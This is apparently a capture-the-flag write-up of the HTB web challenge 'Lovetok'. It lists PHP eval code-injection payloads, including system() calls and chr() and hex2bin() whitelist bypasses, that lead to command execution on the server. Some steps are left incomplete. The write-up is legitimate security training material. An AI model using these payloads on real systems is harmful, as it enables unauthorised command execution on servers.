Why So Script-kiddie
ctfs
Code Review SeriesctfsTesting with Bug Bounty WriteupsSecurity Researches
ctfs
Code Review SeriesctfsTesting with Bug Bounty WriteupsSecurity Researches
  • TSG ctf 2023
  • 1337UP intigriti 2023
  • HTB challenges
    • Web
      • Lovetok
      • Trapped source
      • Passman
      • Orbital
      • WayWitch
Powered by GitBook
On this page
  1. HTB challenges
  2. Web

Lovetok

PreviousWebNextTrapped source

Last updated 1 year ago

The website:

We can see that the back-end gives time when we give a certian value to the format parameter:

We also have the code:

we can see that the input we give 'r' is directly going into the eval function:

So we need to inject code here somehow -> but how?

we can try different code payloads like:

  1. ${system($_GET[cmd])}&cmd=ls

  2. ${print(`ls`)}

  3. to bypass the whitelist:

    1. ${system(chr(105).chr(100))}
    2. ${system(hex2bin(6964))}

  4. to bypass restriction for slashes read

and we get the flag: